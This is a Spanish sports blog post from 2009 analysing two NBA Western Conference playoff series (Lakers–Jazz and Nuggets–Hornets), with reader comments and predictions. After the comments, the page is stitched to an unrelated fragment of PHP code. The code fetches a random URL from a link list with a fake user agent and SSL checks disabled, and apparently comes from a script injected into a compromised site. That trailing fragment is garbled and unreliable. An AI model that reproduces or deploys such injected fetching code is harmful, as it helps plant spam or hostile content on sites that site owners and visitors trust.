Análisis Playoffs 2009 – Oeste I

17 de April de 2009 por TheDeerHunter

LOS ANGELES LAKERS (1) VS UTAH JAZZ (8)

Regular: 2-1, 100% victorias locales.

Lakers
P. favor: 106,9
P. contra: 99,3
Ult10: 7-3

Jazz:
P. favor: 103,6
P. contra: 100,9
Ult10: 3-7

No pinta bien la eliminatoria para Utah y es que resulta difícil identificar al mismo equipo del año pasado. Comenzó siendo un problema de lesiones y ha terminado gestándose un germen de descomposición en toda regla. Apenas nada de lo que se podía mejorar lo ha hecho: El último año de contrato de Boozer no le ha supuesto el extra esperado sinó todo lo contrario y pronto se convirtió en foco de inestabilidad; el desarrollo de los jóvenes talentos no ha terminado de conectar con el ideario Sloan. Y por si todo esto fuera poco ni siquiera “el infierno de Salt Lake” impresiona como antaño.

Por el contrario, los Lakers llegan más fuertes que el año pasado. Bynum, Ariza, un Gasol mejor preparado física y mentalmente, Odom de 6º, Kobe sin los problemas de espalda, Radmanovic en Charlotte… La plantilla es netamente superior y el juego también. El año pasado los desbordaron ofensivamente cuando todavía defendían bien así que este año deberían contar con más facilidades. Con todo, algo me dice que los Lakers hubieran preferido otro rival que no fuera Utah… Los problemas que han tenido durante toda la temporada ahora se olvidarán temporalmente.

Claves de la eliminatoria

Minimizar Kobe/Deron: Kirilenko ha sido habitualmente un buen defensor sobre Kobe, turnándose con Brewer. Fisher conoce muy bien a Deron y los Lakers se han encontrado con el inesperado recurso de Shannon Brown. Sin embargo, ambas estrellas han terminado habitualmente masacrando al respectivo rival.
Duelo interior: Sin menospreciar la pareja Okur/Boozer es difícil imaginar ahora mismo algo superior a Bynum/Gasol. No obstante, si Boozer está por la labor pueden tener recursos para plantar batalla.
Segunda unidad: Millsap es lo único que mejorado en Utah con respecto al año pasado. Odom el factor X de L.A. Ambos equipos cuentan a priori con un buen fondo de armario.
– Por mucho que a los pupilos de Sloan les agrade más atacar que defender, no pueden de ninguna de las maneras permitir que los amarillos ronden todos los partidos los 120ptos, como así ha sido desde hace demasiado.
– Los vaivenes de concentración angelinos… aunque esto son playoffs.

Agenda

– En L.A: Domingo 19 de Abril a las 21h (siempre hora española)
– En L.A: Madrugada del martes 21 al miércoles a las 4,30h
– En Salt Lake: Madrugada del jueves 23 al viernes a las 4,30h
– En Salt Lake: Madrugada del sábado 25 al domingo a las 3h

Pronóstico: 4-1 Lakers.

DENVER NUGGETS (2) VS NEW ORLEANS HORNETS (7)

Regular: 2-2, Victoria y derrota en casa ambos.

Nuggets
P. favor: 104,3
P. contra: 100,9
Ult10: 8/2

Hornets
P. favor 95,8
P. contra 94,3
Ult10: 4/6

Queda muy lejos octubre, cuando unos Hornets favoritos arrasaban en pretemporada con un rendimiento colectivo mucho más allá de CP3&West y los Nuggets se desprendían de Camby en medio de rumores de completa disolución del proyecto. Muy pocos podíamos imaginar que veríamos este cruce en las condiciones en las que se va a producir.

Sí logramos vislumbrar alguna de las claves. La plantilla de los Hornets se veía extremadamente corta, y más con la temporadita que ha sufrido Chandler. Posey fue el año pasado fundamental en playoffs y puede que logre volver a serlo, pero en la regular su concurso se ha mostrado insuficiente y Paul y West se han visto demasiado solos.

Después, la salida de Camby despejó el camino de Nené, que ha realizado una temporada soberbia, y la adquisición de Billups terminó de dar cabeza a los Nuggets que ya no se comen 110 puntos por partido.

Con todo, a expensas de la enésima vuelta de Chandler, el choque se presenta extraordinariamente igualado. En los choques previos parecía que ambos se hubiesen puesto de acuerdo para quedar como amigos… que seguro no serán ahora.

Claves de la eliminatoria

La vuelta de Chandler y cómo vuelve. Sin su pleno rendimiento sufrirán mucho dentro. Ni Hilton Armstrong ni Ely pueden plantarle cara a Nené y mucho menos West.
– El espectacular duelo Chris Paul vs Chancey Billups lo tiene todo. El talento de Paul contra la experiencia e inteligencia del “Mariscal” Billups. El base de los Nuggets no lo tendrá fácil, pero tiene el culo pelado de vérselas en estas lides.
El rendimiento de Melo y una nueva reválida sobre de qué tipo de material está hecho. Nunca ha pasado una ronda de playoffs y los Nuggets hace siglos que tampoco. Ésta es una buena oportunidad para no borrarse.
Los 6º hombres. JR Smith está en un estado de forma bestial mientras que Posey tiene que demostrar ahora para qué fue fichado este verano.
El factor cancha. No tanto por Denver como por New Orleans que es una cancha caliente. Si los Hornets ganan todos sus partidos en casa apostaría por ellos aun con la ventaja en contra.

Agenda

– En Denver: Domingo 19 de Abril a las 4,30h (siempre hora española)
– En Denver: Madrugada del miércoles 22 al jueves a las 4,30h
– En N.O.: Tarde del sábado 25 a las 21h
– En N.O.: Madrugada del lunes 27 al martes sin horario previsto en este momento.

Pronóstico: 3-4 Hornets

Comenta

10 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Vale Deer, pero si los Nuggets ganan todos los partidos es casa yo apostaría por ellos …¬ ¬

      Citar

  2. Gallis dice:
    #2

    Coincido en el análisis del Lakers-Utah. Es cierto que los mormones son un rival incomodísimo, más propio de semifinales o final de conferencia que de una primera ronda, pero sería toda una sorpresa que pusieran en problemas “reales” a los angelinos. Yo también pronostico un 4-1, aunque si LA gana el tercer partido, igual el quinto no hace falta.

    El otro ya es más chungo. Como sabéis, no he podido seguir muy a fondo este año, pero creo que, por mucho que los Playoffs sean diferentes, las sensaciones de todo un año no cambian así como así. Hubo un momento en el que parecía que los Nuggets se caerían…y aguantaron. Ser segundo en este salvaje oeste es prueba de ser un equipo muy, muy sólido. En cambio lo de los Hornets es, para mi, un misterio insondable. Sin descartar la sorpresa que apunta Deer, creo que ganaran los Nuggets en 6.

      Citar

  3. TheDeerHunter dice:
    #3

    quizá no me haya expresado bien.

    veo más importante el factor cancha a favor para unos equipos que para otros. Por ese lado New Orleans me sigue pareciendo una plaza difícil… bastante más que Denver digan lo que digan las cifras. Igual es algo psicológico, no lo sé.
    También veo más sólidos mentalmente a unos equipos que a otros para un hipotético 7º partido. Por ahí no me jugaría las canicas a un partido decisivo contra CP3 y más aún después de lo que pasó el año pasado… aunque provablemente tampoco me las jugaría contra Billups y compañía, pero ya me entendéis.

    En resumen, que me parece más fácil que Denver tropiece en casa que al revés y como intuyo que en esta eliminatoria van a haber pocas victorias foráneas, pues… eso quería decir. Pero vamos, que lo de ser Nostradamus tampoco es lo mío…

      Citar

  4. kantonyo dice:
    #4

    Coincido bastante en los dos análisis, aunque yo me decanto por una victoria de Denver.

    Respecto a sus estrellas, creo Anthony ha madurado bastante esta temporada con la salida de Iverson, será importantísimo la participación de Posey para defenderle.

    Chris Paul aún siendo posiblemente el mejor base de la liga, todavia no ha demostrado la personalidad suficiente como para ganar una eliminatoria tan dura, además tendrá en frente a Billups, por lo que no tendrá la libertad suficiente para desarrollar su juego.

    Y debajo del aro, la temporada de Nené ha sido impresionante, y ahora mismo no hay nadie en Hornets que pueda parar al brasileño, dada la reciente lesión de Chandler. También destacar el final de temporada de Jr Smith que seguro ayudará bastante a Denver.

    En la eliminatoria Lakers-Utah, la verdad es que los Jazz son un equipo muy temible, y aunque es sorprendente su pobre octavo puesto, deberíamos también pensar que ha sido el equipo más perjudicado por las lesiones, y que ahora tiene a todos sus jugadores. Para mí Utah es el mejor equipo del Oeste por detrás de Lakers, aunque este año no han tenido la suerte de su parte. Será una importante vara de medir para saber hasta dónde llega el potencial de Lakers este año.

      Citar

  5. couxe dice:
    #5

    En la eliminatoria entre Lakers y Utah, creo que todo lo que sea conceder más de un partido por parte de los Lakers sería un mal resultado, y un error en la gestión de la intensidad de su platilla por parte de tío Phill, que debería salir a machacar sin piedad al rival para tener un camino más ligero…

    En cuanto al partido NO – Denver, son favoritos a priori los de Denver, que además de su mejor balance y de mostrarse más sólidos en la regular, tienen ventaja de campo…
    Sin embargo yo no lo veo tan claro… Con todos mis respetos para Billups, que es un grandísimo jugador muy por encima de lo que dictan sus números, creo que Paul se lo comerá con patatas (si es que le defiende), como ha hecho con todos y cada uno de sus defensores esta temporada… Solo hubo 3 equipos este año (Boston, Houston y Pórtland) capaces de dejarle en números humanos, números que en cualquier caso y en sus peores partidos han sido similares a los medios de Billups… El resto fueron exhibiciones…
    Por tanto, partiendo de que muy posiblemente Paul dará una nueva exhibición, todo dependerá del apoyo que tenga de sus compañeros para poder plantar cara o no a Denver… Así que, la diferencia pueden marcarla los menos habituales, y sobre todo la cabeza de Carmelo, del que se supone una gran aportación, o la inspiración de West, del que no se espera tanto y a veces destapa el tarro de las esencias…

    A mí que me gusta ir a contracorriente, voy a mojarme por un 4-2 para N.Orleans, ya que es un equipo al que veo más capacidad de dar picos de rendimiento, algo fundamental en play off…

      Citar

  6. Olafur dice:
    #6

    Pues me da que los amarillos las pasarán putas pero pasarán con un 4-2 o 4-3

    Respecto a la otra creo que pasará Hornets en un apretado 4-3

      Citar

  7. kantonyo dice:
    #7

    Respecto a Chris Paul, yo recuerdo un partido en que Nelson le barrio completamente de la pista, allá por diciembre, y tambien contra Utah, lo pasó bastante mal en los tres partidos que perdieron frente a Deron Williams. Contra Billups en tres ocasiones ha salido mejor parado en numeros Paul, por una de Billups, pero esa vez ha sido uno de los peores partidos de CP3 en todo el año. Eso sí, no quiere decir que no sea el mejor base, yo lo que digo es que le falta dar un puñetazo en la mesa para consagrarse, y que mejor que un play-offs.

      Citar

  8. Jabho dice:
    #8

    Hombre los Jazz podrían convertirse de repente en el equipo que fueron en otro tiempo o incluso en alguna buena racha de este año, pero no creo en ellos. Además no han acabado bien… Yo dudo entre el 4-1 o el 4-0 como Gallis. Porque además contra otro equipo quizás se hubieran ido animando, pero contra los Lakers saben que no tienen muchas oportunidades… si el año pasado jugando bien ya palmaron más o menos claro.

    Denver – Hornets otro que cree en Denver. Me ha sorprendido que aguantaran el tipo y por eso se han ganado mi confianza y además a los Hornets no les veo carburar. Dependen de que Paul juegue no bien, sino super para ser medianamente competitivos….Denver en 6-7.

      Citar

  9. Viva_Dirk dice:
    #9

    Deacuerdo en el Lakers-Jazzs, no deberiamos tener problemas.

    El Denver-Hornets puede ser un polvorín de mucho cuidado porque incluso sin Chandler creo que Denver le viene perfecto a la pareja Paul-West, y que Posey puede hacer algo decente frente a Melo. Pero claro, luego esta Billups que es lo que Melo y cia necesitaban para asaltar los play-offs. Es la única eliminatoria en la que no soy capaz de dar un ganador.

      Citar

  10. Landrusski dice:
    #10

    en el lakers-utah veo a los lakers ganando pero no sin problemas con un gran gasol y un kobe reservandose un poco para mas adelante.Yo le doy un 4-2

    En el denver-n.Orleans uffff chungo…pero yo veo a denver mejor ekipo ke new.orleans,a pesar de ke new orleans tiene chris paul,denver tiene a billups y sobre todo a melo que espero ke demuestre el gran jugador que es…ahhh por cierto,yo veo mas importante el factor stojakovic ke posey para dar alguna posibilidad a new orleans…mi pronostico es 4-3 para denver

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>